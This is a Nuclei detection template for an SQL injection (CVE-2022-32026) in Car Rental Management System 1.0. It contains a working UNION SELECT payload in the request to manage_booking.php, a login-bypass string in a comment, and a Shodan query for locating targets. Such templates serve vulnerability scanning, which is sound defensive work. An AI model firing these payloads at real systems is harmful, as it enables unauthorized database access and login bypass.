nuclei-templates/http/cves/2022/CVE-2022-32026.yaml

62 lines
2.5 KiB
YAML

id: CVE-2022-32026
info:
name: Car Rental Management System 1.0 - SQL Injection
author: arafatansari
severity: high
description: |
Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_booking.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0.
reference:
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-32028
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-32026
cwe-id: CWE-89
epss-score: 0.00817
epss-percentile: 0.7985
cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: car_rental_management_system_project
product: car_rental_management_system
shodan-query: http.html:"Car Rental Management System"
comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username.
tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project
variables:
num: "999999999"
http:
- raw:
- |
POST /admin/ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
- |
GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1
Host: {{Hostname}}
skip-variables-check: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'
- type: status
status:
- 200
# digest: 4a0a004730450221009a27ead44d0f0f4816b414a71f047a0b245444516eaab4cf6b55081ff8173b1802204e3401ae5d2a3fe94a7d6d2851ea217d777f89d14c1c89b6064a4b30d780964f:922c64590222798bb761d5b6d8e72950